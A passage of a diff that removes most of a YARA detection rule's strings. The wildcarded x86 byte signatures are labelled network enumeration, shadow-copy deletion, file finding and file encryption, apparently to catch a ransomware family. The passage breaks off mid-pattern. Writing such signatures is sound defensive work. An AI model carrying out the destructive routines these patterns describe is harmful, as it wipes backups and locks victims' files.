-            ?? ?? ?? 83 C4 ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89
-            0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D
-        }
-		$network_enumeration_v1_p1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
-            ?? ?? 53 56 57 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50
-            E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 83 3A ?? 0F 8E ??
-            ?? ?? ?? 33 DB 89 5C 24 ?? 0F 1F 00 8D 42 ?? 03 C3 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 15 ?? ?? ?? ?? 8B C3 BB ?? ?? ?? ?? 89 44 24 ?? 83 C4 ?? 89 5C 24 ?? 8D 72 ?? 03
-            F0 8B CE 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D
-            84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 6A ?? 50 6A
-            ?? 8D 84 24 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ??
-            ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ??
-            ?? ?? ?? 75 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 8D 44 24 ?? 50 6A ?? 8D 44 24 ?? 50 6A ?? 8D 44
-            24 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33
-            FF 39 7C 24 ?? 76 ?? 33 F6 8B 44 24 ?? 83 7C 06 ?? ?? 75 ?? 68 ?? ?? ?? ?? FF 34 06
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 44 24 ?? FF 34 06 8D 44 24 ?? 50 8D 84 24 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 8D 4C 24
-        }
-		$network_enumeration_v1_p2 = {
-            68 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B 7C 24 ?? 72
-            ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 81 FB ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 15 ?? ?? ??
-            ?? 8B 5C 24 ?? 8B 44 24 ?? 05 ?? ?? ?? ?? 83 EB ?? 89 44 24 ?? 89 5C 24 ?? 0F 85 ??
-            ?? ?? ?? 8B 74 24 ?? 8B 5C 24 ?? 46 81 C3 ?? ?? ?? ?? 89 74 24 ?? 89 5C 24 ?? 3B 32
-            0F 8C ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 3A ?? C7 44 24 ?? ?? ??
-            ?? ?? 0F 8E ?? ?? ?? ?? 33 DB 89 5C 24 ?? 66 0F 1F 44 00 ?? 8D 42 ?? 03 C3 50 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B C3 BB ?? ?? ?? ?? 89 44 24 ?? 83 C4 ??
-            89 5C 24 ?? 8D 72 ?? 03 F0 8B CE 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 0F 84 ?? ?? ??
-            ?? 56 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 44 24 ?? 6A ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85
-            C0 75 ?? FF 15 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 8D 44 24 ?? 50 6A ?? 8D
-        }
-		$network_enumeration_v1_p3 = {
-            44 24 ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 81 FB
-            ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33 FF 39 7C 24 ?? 76 ?? 33 F6 0F 1F 84 00 ?? ?? ?? ??
-            8B 44 24 ?? 83 7C 06 ?? ?? 75 ?? 68 ?? ?? ?? ?? FF 34 06 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 75 ?? 8B 44 24 ?? FF 34 06 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 50 8D 84 24
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B 7C 24 ?? 72 ?? FF 74 24 ?? FF 15 ?? ??
-            ?? ?? 81 FB ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 5C 24 ?? 8B 44 24 ??
-            05 ?? ?? ?? ?? 83 EB ?? 89 44 24 ?? 89 5C 24 ?? 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 8B 5C
-            24 ?? 46 81 C3 ?? ?? ?? ?? 89 74 24 ?? 89 5C 24 ?? 3B 32 0F 8C ?? ?? ?? ?? 68 ?? ??
-            ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 83 C4 ?? 33
-            C0 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$delete_shadow_copies_v1_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 6A ?? 6A ?? FF 15
-            ?? ?? ?? ?? 85 C0 79 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B
-            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A
-            ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 79 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF
-            15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8D 85 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 6A
-            ?? 68 ?? ?? ?? ?? FF D7 85 C0 78 ?? 68 ?? ?? ?? ?? FF D3 8B F0 8D 85 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 11 56 51 FF 52 ?? 8B F0 8D 85 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 85 F6 0F 88 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF D7 85 C0 79 ?? 50 68
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF D3 8B 8D
-            ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 8B 11 6A ?? 6A ?? 6A ?? 6A
-            ?? 6A ?? 56 51 FF 52 ?? 56 8B F8 FF 15 ?? ?? ?? ?? 85 FF 79 ?? 57 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 8B 08 50 FF 51 ?? E9 ?? ?? ?? ?? 6A ?? 6A ??
-            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 79 ?? 50 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 8B 08 50 FF 51 ?? 8B 85 ?? ??
-            ?? ?? 50 8B 08 FF 51 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 68 ?? ?? ?? ?? 8B F8 FF
-        }
-		$delete_shadow_copies_v1_p2 = {
-            D3 8B 8D ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 6A ??
-            8B 11 6A ?? 56 57 51 FF 52 ?? 57 8B 3D ?? ?? ?? ?? 8B D8 FF D7 56 FF D7 85 DB 79 ??
-            53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 8B 08 50 FF 51 ?? 8B 85
-            ?? ?? ?? ?? 50 8B 08 FF 51 ?? E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 01 8D 95 ?? ?? ?? ?? 52 8D 95
-            ?? ?? ?? ?? 52 6A ?? 6A ?? 51 FF 50 ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 6A ?? 52 8B 08 6A ?? 68 ?? ?? ?? ?? 50 FF 51 ??
-            FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D3 83 C4 ?? FF B5 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 8B F8 8D 85 ?? ?? ?? ?? 0F 57 C0 57 56 6A ?? 6A ?? 6A ?? 6A ?? 6A
-            ?? 6A ?? 50 6A ?? 0F 11 07 FF 15 ?? ?? ?? ?? 6A ?? FF 37 FF 15 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            50 8B 08 FF 51 ?? 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 85 C9 0F 85 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 08 FF 51 ?? 8B 85 ?? ?? ?? ?? 50 8B 08 FF 51 ?? 8B 85
-            ?? ?? ?? ?? 50 8B 08 FF 51 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 5F 5E 33 CD
-            5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_v1_p1 = {
-            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? 50 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45
-            ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F9 89 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 37 83 C4 ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 0F 57 C0 C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48
-            ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 6A ?? 56 8D 8D ?? ?? ??
-            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ??
-            8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 74 ?? FF
-            15 ?? ?? ?? ?? 50 FF 37 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 E9
-            ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 FF 50
-            ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? C6 45 ?? ?? 8B
-        }
-		$encrypt_files_v1_p2 = {
-            85 ?? ?? ?? ?? 8B 48 ?? F6 84 0D ?? ?? ?? ?? ?? 75 ?? 8B 8C 0D ?? ?? ?? ?? 8D 95 ??
-            ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 01 6A ?? 52 FF 50 ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? EB
-            ?? 0F 57 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11 85 ??
-            ?? ?? ?? C6 45 ?? ?? 8B 40 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 FF 50 ?? 6A ??
-            C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83 EC ?? 03 BD ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B B5 ??
-            ?? ?? ?? 8D 45 ?? FF 76 ?? 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 45 ?? FF 76 ?? 6A ?? 6A ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ??
-            ?? ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50
-            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 6A ?? FF 36 E8 ?? ?? ?? ?? C6 45 ?? ?? 8B
-            85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 33 F6 E9 ?? ?? ?? ?? 51 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ??
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 90
-            8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 6A ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 90 8A 01 41 84
-            C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 6A ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
-        }
-		$encrypt_files_v1_p3 = {
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 8B 42 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 FF 50 ?? 8B
-            95 ?? ?? ?? ?? C6 45 ?? ?? 8B 4A ?? 83 BC 0D ?? ?? ?? ?? ?? 75 ?? 8B 8C 0D ?? ?? ??
-            ?? 85 C9 74 ?? 8D 85 ?? ?? ?? ?? 3B C8 74 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 4A
-            ?? 8B 84 0D ?? ?? ?? ?? 85 C0 0F 94 85 ?? ?? ?? ?? C6 45 ?? ?? A8 ?? 75 ?? 8B 8C 0D
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 01 6A ?? 52 FF 50 ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 84 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? EB ?? 0F 57
-            C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11 85 ?? ?? ?? ??
-            C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
-            8B 85 ?? ?? ?? ?? 8B 40 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 FF 50 ?? C6 45 ??
-            ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B F0 83 C4 ?? 89 B5 ?? ?? ?? ?? 85 F6 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 E9 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 83 78 ?? ?? 0F 85 ?? ?? ?? ?? 81 FF ?? ?? ?? ?? 0F 87 ?? ??
-            ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 66 90 BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 3B FE 6A ?? 0F
-            42 F7 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 6A
-        }
-		$encrypt_files_v1_p4 = {
-            6A ?? 6A ?? 56 FF B5 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            8D ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 46 ?? 50 FF B5 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C0 ?? 03 C6 89 85 ?? ??
-            ?? ?? 2B FE 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B CF C1 E1 ?? 2B CF 03 C9 83 F9 ?? 0F
-            82 ?? ?? ?? ?? B8 ?? ?? ?? ?? F7 E1 8B FA C1 EF ?? 0F 1F 00 BE ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? 3B FE 6A ?? 0F 42 F7 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 45
-            ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF B5 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ??
-            8D 46 ?? 50 FF B5 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83
-            C0 ?? 03 C6 89 85 ?? ?? ?? ?? 2B FE 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ??
-            03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? FF 37 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D6 83 C4 ?? 83 3D ?? ?? ?? ?? ??
-            75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ??
-            ?? ?? 50 FF 37 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 50 FF D6 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68
-        }
-		$find_files_v2 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 8B 45
-            ?? 53 8B 5D ?? 56 57 53 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 4C 24
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            8B F0 89 74 24 ?? 83 FE ?? 75 ?? FF 15 ?? ?? ?? ?? 50 53 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8B
-            3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44
-            24 ?? 50 FF D7 85 C0 74 ?? F7 44 24 ?? ?? ?? ?? ?? 75 ?? 8D 44 24 ?? 50 53 8D 84 24
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F6 44 24 ?? ?? 74 ?? BE ?? ??
-            ?? ?? 8D 44 24 ?? 50 FF 36 FF D7 85 C0 74 ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? FF 74
-            24 ?? 8B 4C 24 ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 74 24 ?? 8D 44 24 ?? 50
-            56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ??
-            ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
-            74 ?? 8D 4C 24 ?? 3B C1 74 ?? 68 ?? ?? ?? ?? 83 C0 ?? 50 8D 84 24 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? 33 C0 66 89 84 24 ?? ?? ?? ?? 8D
-            84 24 ?? ?? ?? ?? 50 FF 36 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 C6 ??
-            81 FE ?? ?? ?? ?? 7C ?? 8B 74 24 ?? 8B CB E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? FF 74 24 ?? 50 E8 ?? ?? ??
-            ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 0F 85
-        }
-		$encrypt_files_v2_p1 = {
-            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? 50 53 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 50
-            8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 43 ?? 8B 73 ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 6A ?? 50 89 B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ??
-            0F 57 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ??
